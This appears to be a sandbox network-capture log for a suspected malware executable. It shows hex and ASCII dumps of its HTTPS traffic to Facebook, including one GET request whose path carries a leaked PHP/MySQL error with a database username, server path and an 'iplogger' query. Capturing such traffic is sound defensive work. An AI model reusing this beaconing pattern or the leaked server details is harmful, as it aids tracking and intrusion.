2022-10-07 13:58:24 UTC	19	IN	Data Raw: 5c 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 6c 65 78 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f 63 6f Data Ascii: \/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/co
2022-10-07 13:58:24 UTC	20	IN	Data Raw: 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 70 70 72 65 67 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a 31 2c Data Ascii: \/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1,
2022-10-07 13:58:24 UTC	22	IN	Data Raw: 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 22 3a 36 30 30 Data Ascii: ,"app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue":600
2022-10-07 13:58:24 UTC	23	IN	Data Raw: 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 32 63 4f 50 4a 6c 47 78 7a 63 65 59 4e 65 74 67 47 6c 6b 38 6c 72 47 66 6b 71 55 50 57 74 78 75 6e 62 5f 6c 6b 75 61 64 51 6d 35 7a 46 74 68 36 4f 64 47 61 65 30 44 63 47 64 33 39 54 4c 6c 42 79 73 54 4e 43 68 79 56 43 67 52 4d 63 76 47 44 47 2d 55 2d 46 38 64 31 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 32 63 4f 50 4a 6c 47 78 7a 63 65 59 4e 65 74 67 47 6c 6b 38 6c 72 47 66 6b 71 55 50 57 74 78 75 6e 62 5f 6c 6b 75 61 64 51 6d 35 7a 46 74 68 36 4f 64 47 61 65 30 44 63 47 64 33 39 54 4c 6c 42 Data Ascii: clearIntervalBlue","Aa2cOPJlGxzceYNetgGlk8lrGfkqUPWtxunb_lkuadQm5zFth6OdGae0DcGd39TLlBysTNChyVCgRMcvGDG-U-F8d1U"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa2cOPJlGxzceYNetgGlk8lrGfkqUPWtxunb_lkuadQm5zFth6OdGae0DcGd39TLlB
2022-10-07 13:58:24 UTC	25	IN	Data Raw: 6e 66 69 67 22 2c 5b 5d 2c 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 4c 6f 63 61 6c 65 22 2c 5b 5d 2c 7b 22 63 6f 64 65 22 3a 22 65 6e 5f 55 53 22 7d 2c 35 39 35 34 5d 2c 5b 22 55 53 49 44 4d 65 74 61 64 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 5f 69 64 22 3a 22 3f 22 2c 22 74 61 62 5f 69 64 22 3a 22 22 2c 22 70 61 67 65 5f 69 64 22 3a 22 50 72 6a 64 79 74 63 31 71 35 34 61 78 73 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 31 73 7a 78 51 58 70 7a 57 41 64 37 5f 33 35 57 6f 71 34 34 33 79 39 31 56 6e 56 6a 61 4d 49 34 64 4f 39 6b 50 4d 7a 34 47 69 70 51 31 33 32 Data Ascii: nfig",[],{},2393],["IntlCurrentLocale",[],{"code":"en_US"},5954],["USIDMetadata",[],{"browser_id":"?","tab_id":"","page_id":"Prjdytc1q54axs","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa1szxQXpzWAd7_35Woq443y91VnVjaMI4dO9kPMz4GipQ132
2022-10-07 13:58:24 UTC	26	IN	Data Raw: 74 6c 65 3d 22 47 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 62 5f 6c 6f 67 6f 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 39 31 36 37 64 36 22 3e 3c 75 3e 46 61 63 65 62 6f 6f 6b 3c 2f 75 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 34 20 72 66 6c 6f 61 74 20 5f 6f 68 66 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 64 3d 22 75 5f 30 5f 30 5f 38 6f 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 22 3e 4a 6f 69 6e 20 6f 72 20 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 20 e2 80 89 20 3c 69 20 Data Ascii: tle="Go to Facebook home"><i class="fb_logo img sp_ot1t5YjYL3s sx_9167d6"><u>Facebook</u></i></a></h1></div><div class="_yl4 rfloat _ohf" data-testid="royal_login_form"><a href="/" id="u_0_0_8o"><span style="color: white">Join or Log Into Facebook <i
2022-10-07 13:58:24 UTC	26	IN	Data Raw: 31 61 38 62 39 0d 0a 65 6d 22 20 69 64 3d 22 75 5f 30 5f 32 5f 4c 36 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 70 65 72 4e 75 62 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 38 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 22 3e 3c 66 6f 72 6d 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 64 65 76 69 63 65 2d 62 61 73 65 64 2f 72 65 67 75 6c 61 72 2f 6c 6f 67 69 6e 2f 3f 6c 6f 67 69 6e 5f 61 74 74 65 6d 70 74 3d 31 26 61 6d 70 3b 6c 77 76 3d 31 31 30 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 6e 6f 76 61 6c 69 64 61 74 65 3d 22 31 22 20 6f 6e 73 75 62 6d 69 74 3d 22 22 3e 3c 69 6e 70 75 74 20 74 79 70 Data Ascii: 1a8b9em" id="u_0_2_L6"><div class="beeperNub"></div><div class="_yl8"><div class=""><form id="login_form" action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110" method="post" novalidate="1" onsubmit=""><input typ

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49703	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 13:58:40 UTC	28	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 13:58:40 UTC	29	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: 5cdiMoJOQEQILcX45Qf8wnYh81wrLU1KNhjDV4sDWI1s0fWbKsQS7+0gxV59QFub2kUq9j4BJMTTES1NQwPgoQ== Date: Fri, 07 Oct 2022 13:58:40 GMT Priority: u=3,i Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 13:58:40 UTC	30	IN	Data Raw: 31 61 35 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 63 72 4d 65 63 46 72 70 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 Data Ascii: 1a51d<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="crMecFrp">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requ
2022-10-07 13:58:40 UTC	31	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 72 4d 65 63 46 72 70 22 3e 3c 2f 73 74 Data Ascii: (function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="crMecFrp"></st
2022-10-07 13:58:40 UTC	32	IN	Data Raw: 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c Data Ascii: 8b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><l
2022-10-07 13:58:40 UTC	34	IN	Data Raw: 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 Data Ascii: 2%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886
2022-10-07 13:58:40 UTC	35	IN	Data Raw: 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f Data Ascii: 1'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20colo
2022-10-07 13:58:40 UTC	37	IN	Data Raw: 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 Data Ascii: .css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" rel="sty
2022-10-07 13:58:40 UTC	38	IN	Data Raw: 54 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 7a 4d 6b 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 45 34 55 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 79 45 6b 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 53 65 49 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 37 77 45 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 Data Ascii: T4_ZQi0sTjSt-RxzMk"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8E4U"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q6yEk"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK6SeI"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5x7wE"},"1738486":{"re
2022-10-07 13:58:40 UTC	40	IN	Data Raw: 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d Data Ascii: 00,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom
2022-10-07 13:58:40 UTC	41	IN	Data Raw: 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 6e 75 6c Data Ascii: version":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":nul
2022-10-07 13:58:40 UTC	43	IN	Data Raw: 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 Data Ascii: "SRT_BANZAI_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDID
